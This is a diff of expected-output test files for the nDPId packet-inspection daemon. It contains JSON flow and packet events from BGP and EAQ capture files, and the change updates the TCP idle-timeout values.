00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3}
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"}
00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1256636836167}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 2/1

24
test/results/EAQ.pcap.out
View File

@@ -1,15 +1,15 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"EAQ.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432820948562}
00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948562,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948562,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="}
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"}
00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"}
00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}}
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"}
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"}
00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}}
00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948562,"flow_last_seen":1432820948562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948562,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="}
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"}
00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"}
00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}}
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"}
00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"}
00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820949586,"flow_last_seen":1432820949586,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820949586,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820949586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949586,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNX0AAAAAAAADdoAAUsHAACQAA=="}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820949685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949685,"pkt":"ABoRAAACABoRAAABCABFAAAsAAxAABARDWHIuYqSCggAARdwzCEAGAX1AAAAAAAADdoAAUsHAABgAA=="}
@@ -162,7 +162,7 @@
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
@@ -172,7 +172,7 @@
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
